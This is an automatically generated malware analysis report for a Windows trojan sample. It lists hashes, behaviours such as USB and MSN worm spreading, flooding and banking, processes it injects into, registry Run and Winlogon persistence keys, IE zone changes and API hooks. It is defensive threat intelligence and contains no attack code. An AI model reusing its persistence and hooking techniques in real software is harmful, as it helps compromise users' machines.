Trojan.Agent.BENW_bf5d605786

by malwarelabrobot on August 20th, 2014 in Malware Descriptions.

Trojan.Win32.Badur.iuoq (Kaspersky), Trojan.Agent.BENW (AdAware), mzpefinder_pcap_file.YR, Sinowal.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericDownloader.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: bf5d605786ccc65696c14cdf7b95d080
SHA1: fdc87f3e52749752a570786c3f26482b96134181
SHA256: ce01864eca51d1116ec0732e1e73cf7bc00bcfd65ccc7d85ca0cdf6ebce4dd75
SSDeep: 1536:MUBCOFhmmW24xrtHbcWgxtvDL3JNabt0hCwQr:MCmrtHbc7T3XQr
Size: 74240 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Newtonsoft
Created at: 2014-08-10 10:08:55
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
IRCBot A bot can communicate with command and control servers via IRC channel.
MSNWorm A worm can spread its copies through the MSN Messanger.
DNSBlocker A program can block designated DNS servers for making it difficult for users to locate specific domains or web sites on the Internet.
UDPFlooder This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host.
SYNFlooder This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
Trojan-Proxy This program can launch a proxy server (SOCKS4) on a designated TCP port.
USBInfector A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.


Process activity

The Trojan creates the following process(es):

%original file name%.exe:192
kusadtylds.exe:1512
hsadjku.exe:1524
hsadjku.exe:1376
yhtdayrg.exe:1120
yhtdayrg.exe:1800
dw3re.exe:3560
dw3re.exe:3308
ksaduytr.exe:1096
ksaduytr.exe:1664
ksaduytr.exe:764

The Trojan injects its code into the following process(es):

calc.exe:2036
notepad.exe:1608
kusadtylds.exe:112
mscorsvw.exe:284
svchost.exe:1528
jqs.exe:324
winlogon.exe:716
services.exe:760
svchost.exe:932
svchost.exe:1012
svchost.exe:1100
svchost.exe:1144
svchost.exe:1184
spoolsv.exe:1432
wmiprvse.exe:1928
Explorer.EXE:1988

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ksaduytr.exe (33007 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\bet[1].exe (46913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yhtdayrg.exe (39323 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dw3re.exe (2738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hsadjku.exe (16668 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\zpm[1].exe (19865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe (6366 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\bnew[1].exe (20855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\dqnew[1].exe (13561 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\ng[1].exe (37249 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\hsadjku.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dw3re.exe (0 bytes)

The process notepad.exe:1608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\index.dat (1060 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@wipmania[1].txt (171 bytes)

The process kusadtylds.exe:112 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\bnfjdaocr[1].htm (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)

The process hsadjku.exe:1376 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\Desktop.ini (63 bytes)
C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\h73a3b6a.exe (673 bytes)

The process yhtdayrg.exe:1800 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)

The Trojan deletes the following file(s):

%Program Files%\Common Files\CreativeAudio\desktop.ini (0 bytes)

The process dw3re.exe:3560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4115614\h7a3b6a.exe (673 bytes)
C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4115614\Desktop.ini (63 bytes)

The process ksaduytr.exe:1664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ksaduytr.exe.gonewiththewings (0 bytes)

Registry activity

The process %original file name%.exe:192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Classes\CLSID\{ADDA2083-DA8C-774C-B0D4-CEBFD88F4108}\0E7302EC\CW1]
"192" = "88 00 00 00 48 0C 00 00 8D F1 EF 00 B2 00 04 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED AA F9 D2 93 80 F1 CB 8D 6B 64 A3 D3 34 4F E5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process calc.exe:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 54 70 D3 ED E1 05 6F 19 E3 AA E3 E9 7B 83 78"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Classes\CLSID\{ADDA2083-DA8C-774C-B0D4-CEBFD88F4108}\0E7302EC\CW1]
"2036" = "88 00 00 00 90 08 00 00 8D F1 A2 00 24 01 12 00"

The process notepad.exe:1608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 AF AD C5 F2 01 68 0C 1A 56 89 A9 FB 04 C4 FD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process kusadtylds.exe:112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"WireLMode" = "4F 91 C3 5F 54 B1 F3 01 02 5A 8B 95 49 E9 76 7F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKCU\Software\Classes\CLSID\{ADDA2083-DA8C-774C-B0D4-CEBFD88F4108}\0E7302EC\CW1]
"112" = "88 00 00 00 2C 0A 00 00 8D F1 FD 00 4C 01 12 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 1D BD 7A E7 D5 67 3E 99 9E C3 C9 3A 46 07 D7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftStCnt" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\kusadtylds.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process kusadtylds.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 A6 04 9C 21 C5 F6 86 6E 06 B2 F1 29 CE 40 3E"

The process hsadjku.exe:1524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 B2 EF BA E8 E1 6F A4 AD 88 D4 92 93 A0 A7 F2"

The process hsadjku.exe:1376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Taskman" = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\h73a3b6a.exe"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\h73a3b6a.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dha38b2" = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\h73a3b6a.exe"

The process yhtdayrg.exe:1120 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 58 2A 27 78 6E 60 B9 C8 AB F5 34 B5 59 7F 92"

The process yhtdayrg.exe:1800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 76 C9 09 E9 89 C4 D9 EC 3D E2 CE 98 24 B7 AD"

[HKCU\Software\Classes\CLSID\{ADDA2083-DA8C-774C-B0D4-CEBFD88F4108}\0E7302EC\CG1]
"BID" = "20 00 08 00 13 00 08 00 DE 07 00 00 14 00 88 FF"

[HKCU\Software\Win7zip]
"uuid" = "AD DA 20 83 DA 8C 77 4C B0 D4 CE BF D8 8F 41 08"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\slljcdlve.exe]
"DisableExceptionChainValidation" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Classes\CLSID\{ADDA2083-DA8C-774C-B0D4-CEBFD88F4108}\0E7302EC\CG1]
"HAL" = "05 EE 00 00"

The process dw3re.exe:3560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D F7 43 CA C7 4E DD D2 B0 DF 29 26 14 27 06 92"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Taskman" = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4115614\h7a3b6a.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dha8b2" = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4115614\h7a3b6a.exe"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4115614\h7a3b6a.exe,explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\h73a3b6a.exe"

The process dw3re.exe:3308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 59 9B 83 4C 7C 5F 63 8D 9E 4C 63 70 AA 82 23"

The process ksaduytr.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 44 42 58 74 4A AB ED 17 04 01 A7 13 D6 03 18"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process ksaduytr.exe:1664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 F3 B6 6A 21 20 E6 9A 97 76 4E 86 C0 C2 1C 87"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process ksaduytr.exe:764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 21 95 C3 15 B5 3D 1E 74 6F 23 87 0B BD C7 15"

Dropped PE files

MD5 File path
cb77e2072a6aa55b33424399ac254dee c:\Documents and Settings\"%CurrentUserName%"\Application Data\c731200
cb77e2072a6aa55b33424399ac254dee c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Adobe\Reader_sl.exe
cb77e2072a6aa55b33424399ac254dee c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\ksaduytr.exe.gonewiththewings
7aaa72b660d6be86f0864ac607a5ebce c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\kusadtylds.exe.gonewiththewings
590fb23c6f659b05987ea4f7bc5ca562 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\bet[1].exe
7aaa72b660d6be86f0864ac607a5ebce c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\zpm[1].exe
cb77e2072a6aa55b33424399ac254dee c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\ng[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in WININET.dll:

HttpSendRequestW
InternetWriteFile
HttpSendRequestA

The Trojan installs the following user-mode hooks in DNSAPI.dll:

DnsQuery_A
DnsQuery_W

The Trojan installs the following user-mode hooks in WS2_32.dll:

send
GetAddrInfoW

The Trojan installs the following user-mode hooks in kernel32.dll:

MoveFileA
CopyFileW
CopyFileA
MoveFileW
CreateFileW
CreateFileA

The Trojan installs the following user-mode hooks in ntdll.dll:

LdrLoadDll
NtResumeThread
NtQueryDirectoryFile
NtEnumerateValueKey

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.
A worm can spread its copies through the MSN Messanger.

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 25587 25600 4.567 ff703bde788271d4af39921de87cec7b
.rdata 32768 8330 8704 3.67274 59f87fac658d73e2f0d54d7bd7f054bd
.data 45056 189728 14848 4.01783 08655243d6d4d8850531fe40917b8316
.rsrc 237568 23840 24064 4.20627 6b0c91362284bc4011d8c88f9ed51459

Dropped from:

